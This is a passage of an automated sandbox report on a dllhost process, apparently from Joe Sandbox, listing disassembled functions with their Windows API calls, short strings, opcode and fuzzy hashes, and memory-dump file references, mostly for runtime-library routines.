Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 7cfe7554f941fbd5b367065fae7e79dcc4f415f66e0cd49808874d915f92cc81
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: D6110A3A6057C093EB248F21E44429E67B1FB85B94F48C03AFE4D037A5FB6EC9568784

Function 000001EF09228CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF09228CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EF09228D62
RtlUnwindEx.NTDLL ref: 000001EF09228DBC

Strings

csm, xrefs: 000001EF09228D49

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: e80d129308763868ed1064e24069be532945dd88132d2db73d21307722edc7fd
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 9651A332311680ABDB54DB25E444BAC7793F794B98F588139FE4A4779AFB78C842C700

Function 000001EF09428CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF09428CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EF09428D62
RtlUnwindEx.NTDLL ref: 000001EF09428DBC

Strings

csm, xrefs: 000001EF09428D49

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 6b6d007ddbd97d1147ff4583451adbdc8cf453512616ae467a66ee54ab1f90cb
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: BE51933A3216C08ADB54CB15D4447AC7793F794BA8F98C139FE498778AE77AC842C700

Function 000001EF0922AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF0922AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001EF0922ABBC

Strings

csm, xrefs: 000001EF0922AAF6
csm, xrefs: 000001EF0922AC0E

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 5253ce4b0ab5c783c819a681e85f89979cd63a3d05fd26d82592a625e390e4e6
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F2516B362007C0ABEB748F22D54439C77A6F395B94F18412AEE9947FD6EB38C492CB01

Function 000001EF0922A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001EF0922A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001EF0922A7A7

Strings

MOC, xrefs: 000001EF0922A76F
RCC, xrefs: 000001EF0922A777

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: d01713d7866439f433d04bf9c4d385755454d4f036a3481f93411054f2e5b170
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1D619D72508BC495EB218F15E4407DEB7A1F7D5B98F084229FF9813B9AEB78C192CB00

Function 000001EF0942A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001EF0942A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001EF0942A7A7

Strings

RCC, xrefs: 000001EF0942A777
MOC, xrefs: 000001EF0942A76F

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6c8d2704c497561334c91a39e584da804b581c2ee66e21f153cd8c06178d1d5c
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 12618F76508BC481DB208B15E4403DEB7A1F7C5BA8F88C629EF9813B96EB79C195CB00

Function 000001EF0942AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF0942AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001EF0942ABBC

Strings

csm, xrefs: 000001EF0942AAF6
csm, xrefs: 000001EF0942AC0E

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 4ae4e5a0f584ff2e0bb065ff78f464e7dbdf4d92b172425049829fc862c41691
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F951813A1007C08BEB748B12D55439C7B96F794BA4F9CC129EE8947BD6EB3AC452CB01

Function 000001EF091F9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF091F9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001EF091F9FBC

Strings

csm, xrefs: 000001EF091F9EF6
csm, xrefs: 000001EF091FA00E

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ed867bf490fe9edb46d23d820971af2e554984b3e8f8f85e870d5ca5af507103
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 25517D333046C88AEB749F11E56439C7BA2F795B94F1C4169EE8E47B96EB38C452CB01

Function 000001EF09223950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001EF09223972
StrStrW.SHLWAPI ref: 000001EF09223990
StrToIntW.SHLWAPI ref: 000001EF092239B7

Part of subcall function 000001EF09221A30: OpenProcess.KERNEL32 ref: 000001EF09221A56
Part of subcall function 000001EF09221A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09221A74
Part of subcall function 000001EF09221A30: PathFindFileNameW.SHLWAPI ref: 000001EF09221A83
Part of subcall function 000001EF09221A30: lstrlenW.KERNEL32 ref: 000001EF09221A8F
Part of subcall function 000001EF09221A30: StrCpyW.SHLWAPI ref: 000001EF09221AA2
Part of subcall function 000001EF09221A30: CloseHandle.KERNEL32 ref: 000001EF09221AB0

Part of subcall function 000001EF09223F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0922272F), ref: 000001EF09223FA0

Strings

pid_, xrefs: 000001EF09223968

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: f71b0ed643d9ce12423c0c0b3904c660f3e54305a65c5a07b75257575b8e5ad8
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 11112C313147C1A1EB10DB25E9413DE63A6B7C8B80F98403DBE8983696FF79C906C700

Function 000001EF09423950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001EF09423972
StrStrW.SHLWAPI ref: 000001EF09423990
StrToIntW.SHLWAPI ref: 000001EF094239B7

Part of subcall function 000001EF09421A30: OpenProcess.KERNEL32 ref: 000001EF09421A56
Part of subcall function 000001EF09421A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09421A74
Part of subcall function 000001EF09421A30: PathFindFileNameW.SHLWAPI ref: 000001EF09421A83
Part of subcall function 000001EF09421A30: lstrlenW.KERNEL32 ref: 000001EF09421A8F
Part of subcall function 000001EF09421A30: StrCpyW.SHLWAPI ref: 000001EF09421AA2
Part of subcall function 000001EF09421A30: CloseHandle.KERNEL32 ref: 000001EF09421AB0

Part of subcall function 000001EF09423F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0942272F), ref: 000001EF09423FA0

Strings

pid_, xrefs: 000001EF09423968

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 739c27a594544f019f5a91e3a70bf399543559b1d5fe0c4ea777ac803c40adeb
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 831130393147C191EB109B35E9413DE62A6B7D8BA0FD8C13DBE4983696FF6AC906C700

Function 000001EF09231FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001EF09232027
WriteFile.KERNEL32 ref: 000001EF09232304
WriteFile.KERNEL32 ref: 000001EF0923234A
GetLastError.KERNEL32 ref: 000001EF09232409

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 4dd7bcacb5f4c37088deda0d6b789f621bcdb40bac7c610a056ce2d64a50755a
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B7D1B032714A9499E711CFA5D5406DC37B2F394B98F48816EEF6DA7B9AEA34C10BC340

Function 000001EF09431FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001EF09432027
WriteFile.KERNEL32 ref: 000001EF09432304
WriteFile.KERNEL32 ref: 000001EF0943234A
GetLastError.KERNEL32 ref: 000001EF09432409

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 3dc044be511f822cfabf12eaf64e349cb856f500b2bb96619b515d8bc11d722e
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 66D18D36714AD489E711CFB5D5406DC37B2F394BA8F48C12AEE6DA7B9AEA74C106C340

Function 000001EF092214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF092214C6
HeapFree.KERNEL32 ref: 000001EF092214D5
GetProcessHeap.KERNEL32 ref: 000001EF092214E2
HeapFree.KERNEL32 ref: 000001EF092214F1
GetProcessHeap.KERNEL32 ref: 000001EF09221501

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 3da74ff3287f344bcacc237c94d7645f48fb639bdf8b2dede564b841a736576e
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 0601D732614B90DAE714DF66E90499D77A2F789F80B098079FF8D53729EE38D452C740

Function 000001EF094214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF094214C6
HeapFree.KERNEL32 ref: 000001EF094214D5
GetProcessHeap.KERNEL32 ref: 000001EF094214E2
HeapFree.KERNEL32 ref: 000001EF094214F1
GetProcessHeap.KERNEL32 ref: 000001EF09421501

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 29b799a12d1e495360678f6c99d97651764ead528e68b1281528f3514f84822d
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 6B010536A10BD09AEB14DF66E90418D77A2F788F90B49C029EF4D53729EE34D452C740

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744

Function 000001EF092328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001EF092328DF), ref: 000001EF09232A12

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 9c46a2c19d53eff69ec6a622630ec78b3a95a7681e75a5f494be9110ebfae0be
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: C291B0326106D4C9FB608F65D6507ED3BA2F394B88F5C816EEE5A57A86EB34C487C300

Function 000001EF094328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001EF094328DF), ref: 000001EF09432A12

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 95937cfcfb8edb4178ad1d4e88be4bfff70162bf538a61895ba2b850369b4910
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: EA91E33A7106D085FB609F75D5503ED3BA2B794BA8F4CC12EEE5A53686EA74C047C300

Function 000001EF09228090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001EF092280BC
GetCurrentThreadId.KERNEL32 ref: 000001EF092280CA
GetCurrentProcessId.KERNEL32 ref: 000001EF092280D6
QueryPerformanceCounter.KERNEL32 ref: 000001EF092280E6

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 5e7775a56cdc097f371ba2d6cc6758a2bd9f0d92324f9013647d0e0f4e226935
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 07112736711F448AEB00CF60E8543AC33A4F799758F481E39EE6D867A5EB78C1958340

Function 000001EF09428090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001EF094280BC
GetCurrentThreadId.KERNEL32 ref: 000001EF094280CA
GetCurrentProcessId.KERNEL32 ref: 000001EF094280D6
